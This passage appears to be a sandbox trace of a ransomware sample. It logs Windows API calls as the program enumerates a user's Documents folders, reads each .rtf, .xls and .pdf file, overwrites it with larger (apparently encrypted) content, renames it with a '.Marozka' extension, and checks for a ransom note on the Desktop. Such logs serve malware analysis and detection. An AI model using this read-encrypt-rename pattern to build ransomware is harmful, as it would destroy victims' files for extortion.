returned 1 [0052.343] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0052.344] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0052.344] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0052.344] FindClose (in: hFindFile=0xa7d988 | out: hFindFile=0xa7d988) returned 1 [0052.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0052.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0052.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0052.344] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv", lpFilePart=0x0) returned 0x26 [0052.344] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7db88 [0052.345] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0052.345] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0052.345] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0052.345] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0052.345] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0052.345] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0052.346] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0052.346] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0052.346] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0052.346] FindClose (in: hFindFile=0xa7db88 | out: hFindFile=0xa7db88) returned 1 [0052.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0052.346] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0052.346] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\7xWQffD0s v0_TzT.rtf", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\7xWQffD0s v0_TzT.rtf", lpFilePart=0x0) returned 0x3b [0052.347] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0052.347] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\7xWQffD0s v0_TzT.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\7xwqffd0s v0_tzt.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.347] GetFileType (hFile=0x2e0) returned 0x1 [0052.347] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0052.347] GetFileType (hFile=0x2e0) returned 0x1 [0052.347] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x15e9f [0052.348] ReadFile (in: hFile=0x2e0, lpBuffer=0x388b110, nNumberOfBytesToRead=0x15e9f, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x388b110*, lpNumberOfBytesRead=0x5bea48*=0x15e9f, lpOverlapped=0x0) returned 1 [0052.349] CloseHandle (hObject=0x2e0) returned 1 [0052.466] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0052.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0052.466] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0052.466] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\7xWQffD0s v0_TzT.rtf", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\7xWQffD0s v0_TzT.rtf", lpFilePart=0x0) returned 0x3b [0052.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0052.466] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\7xWQffD0s v0_TzT.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\7xwqffd0s v0_tzt.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.468] GetFileType (hFile=0x2e0) returned 0x1 [0052.468] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0052.468] GetFileType (hFile=0x2e0) returned 0x1 [0052.468] WriteFile (in: hFile=0x2e0, lpBuffer=0x38f8a70*, nNumberOfBytesToWrite=0x15ea0, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x38f8a70*, lpNumberOfBytesWritten=0x5bea3c*=0x15ea0, lpOverlapped=0x0) returned 1 [0052.471] CloseHandle (hObject=0x2e0) returned 1 [0052.474] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\7xWQffD0s v0_TzT.rtf", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\7xWQffD0s v0_TzT.rtf", lpFilePart=0x0) returned 0x3b [0052.474] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\7xWQffD0s v0_TzT.rtf.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\7xWQffD0s v0_TzT.rtf.Marozka", lpFilePart=0x0) returned 0x43 [0052.474] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0052.474] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\7xWQffD0s v0_TzT.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\7xwqffd0s v0_tzt.rtf"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x115702d0, ftCreationTime.dwHighDateTime=0x1d4c89e, ftLastAccessTime.dwLowDateTime=0x254c3d60, ftLastAccessTime.dwHighDateTime=0x1d4c8bb, ftLastWriteTime.dwLowDateTime=0xe201b0eb, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x15ea0)) returned 1 [0052.474] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0052.474] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\7xWQffD0s v0_TzT.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\7xwqffd0s v0_tzt.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\7xWQffD0s v0_TzT.rtf.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\7xwqffd0s v0_tzt.rtf.marozka")) returned 1 [0052.475] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\jt0z_YTJgQYg.rtf", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\jt0z_YTJgQYg.rtf", lpFilePart=0x0) returned 0x37 [0052.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0052.475] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\jt0z_YTJgQYg.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\jt0z_ytjgqyg.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.475] GetFileType (hFile=0x2e0) returned 0x1 [0052.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0052.475] GetFileType (hFile=0x2e0) returned 0x1 [0052.475] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x133a0 [0052.475] ReadFile (in: hFile=0x2e0, lpBuffer=0x278d528, nNumberOfBytesToRead=0x133a0, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x278d528*, lpNumberOfBytesRead=0x5bea48*=0x133a0, lpOverlapped=0x0) returned 1 [0052.476] CloseHandle (hObject=0x2e0) returned 1 [0052.596] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0052.596] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0052.596] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0052.597] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\jt0z_YTJgQYg.rtf", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\jt0z_YTJgQYg.rtf", lpFilePart=0x0) returned 0x37 [0052.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0052.597] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\jt0z_YTJgQYg.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\jt0z_ytjgqyg.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.598] GetFileType (hFile=0x2e0) returned 0x1 [0052.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0052.598] GetFileType (hFile=0x2e0) returned 0x1 [0052.598] WriteFile (in: hFile=0x2e0, lpBuffer=0x2813e34*, nNumberOfBytesToWrite=0x133b0, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x2813e34*, lpNumberOfBytesWritten=0x5bea3c*=0x133b0, lpOverlapped=0x0) returned 1 [0052.600] CloseHandle (hObject=0x2e0) returned 1 [0052.602] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\jt0z_YTJgQYg.rtf", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\jt0z_YTJgQYg.rtf", lpFilePart=0x0) returned 0x37 [0052.602] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\jt0z_YTJgQYg.rtf.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\jt0z_YTJgQYg.rtf.Marozka", lpFilePart=0x0) returned 0x3f [0052.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0052.602] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\jt0z_YTJgQYg.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\jt0z_ytjgqyg.rtf"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e732350, ftCreationTime.dwHighDateTime=0x1d4c6cf, ftLastAccessTime.dwLowDateTime=0x2da576f0, ftLastAccessTime.dwHighDateTime=0x1d4ca75, ftLastWriteTime.dwLowDateTime=0xe214d388, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x133b0)) returned 1 [0052.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0052.602] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\jt0z_YTJgQYg.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\jt0z_ytjgqyg.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\jt0z_YTJgQYg.rtf.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\jt0z_ytjgqyg.rtf.marozka")) returned 1 [0052.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0052.603] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS", lpFilePart=0x0) returned 0x36 [0052.603] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d788 [0052.603] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.604] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.604] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.604] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.604] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.604] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0052.604] FindClose (in: hFindFile=0xa7d788 | out: hFindFile=0xa7d788) returned 1 [0052.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0052.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0052.604] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0052.604] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS", lpFilePart=0x0) returned 0x36 [0052.604] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7dbc8 [0052.605] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.605] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.605] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.605] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.605] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.605] FindNextFileW (in: hFindFile=0xa7dbc8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0052.605] FindClose (in: hFindFile=0xa7dbc8 | out: hFindFile=0xa7dbc8) returned 1 [0052.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0052.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0052.606] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\8kz4K3w 5zZ.xls", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\8kz4K3w 5zZ.xls", lpFilePart=0x0) returned 0x46 [0052.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0052.606] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\8kz4K3w 5zZ.xls" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\-lw4atn v351zws\\8kz4k3w 5zz.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.606] GetFileType (hFile=0x2e0) returned 0x1 [0052.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0052.606] GetFileType (hFile=0x2e0) returned 0x1 [0052.606] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0x18003 [0052.607] ReadFile (in: hFile=0x2e0, lpBuffer=0x3935090, nNumberOfBytesToRead=0x18003, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x3935090*, lpNumberOfBytesRead=0x5be9d4*=0x18003, lpOverlapped=0x0) returned 1 [0052.608] CloseHandle (hObject=0x2e0) returned 1 [0052.680] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0052.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0052.680] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0052.680] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\8kz4K3w 5zZ.xls", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\8kz4K3w 5zZ.xls", lpFilePart=0x0) returned 0x46 [0052.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0052.680] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\8kz4K3w 5zZ.xls" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\-lw4atn v351zws\\8kz4k3w 5zz.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.681] GetFileType (hFile=0x2e0) returned 0x1 [0052.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0052.681] GetFileType (hFile=0x2e0) returned 0x1 [0052.682] WriteFile (in: hFile=0x2e0, lpBuffer=0x36a1ac8*, nNumberOfBytesToWrite=0x18010, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x36a1ac8*, lpNumberOfBytesWritten=0x5be9c8*=0x18010, lpOverlapped=0x0) returned 1 [0052.684] CloseHandle (hObject=0x2e0) returned 1 [0052.693] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\8kz4K3w 5zZ.xls", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\8kz4K3w 5zZ.xls", lpFilePart=0x0) returned 0x46 [0052.693] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\8kz4K3w 5zZ.xls.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\8kz4K3w 5zZ.xls.Marozka", lpFilePart=0x0) returned 0x4e [0052.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0052.693] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\8kz4K3w 5zZ.xls" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\-lw4atn v351zws\\8kz4k3w 5zz.xls"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x638b12b0, ftCreationTime.dwHighDateTime=0x1d4c9d6, ftLastAccessTime.dwLowDateTime=0x661e2090, ftLastAccessTime.dwHighDateTime=0x1d4d1a0, ftLastWriteTime.dwLowDateTime=0xe22315b8, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x18010)) returned 1 [0052.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0052.693] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\8kz4K3w 5zZ.xls" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\-lw4atn v351zws\\8kz4k3w 5zz.xls"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\8kz4K3w 5zZ.xls.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\-lw4atn v351zws\\8kz4k3w 5zz.xls.marozka")) returned 1 [0052.694] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\T6YzsYK-KVX.pdf", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\T6YzsYK-KVX.pdf", lpFilePart=0x0) returned 0x46 [0052.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0052.694] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\T6YzsYK-KVX.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\-lw4atn v351zws\\t6yzsyk-kvx.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.694] GetFileType (hFile=0x2e0) returned 0x1 [0052.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0052.694] GetFileType (hFile=0x2e0) returned 0x1 [0052.694] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0xe5e4 [0052.694] ReadFile (in: hFile=0x2e0, lpBuffer=0x2668880, nNumberOfBytesToRead=0xe5e4, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x2668880*, lpNumberOfBytesRead=0x5be9d4*=0xe5e4, lpOverlapped=0x0) returned 1 [0052.695] CloseHandle (hObject=0x2e0) returned 1 [0052.712] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0052.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0052.712] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0052.712] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\T6YzsYK-KVX.pdf", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN 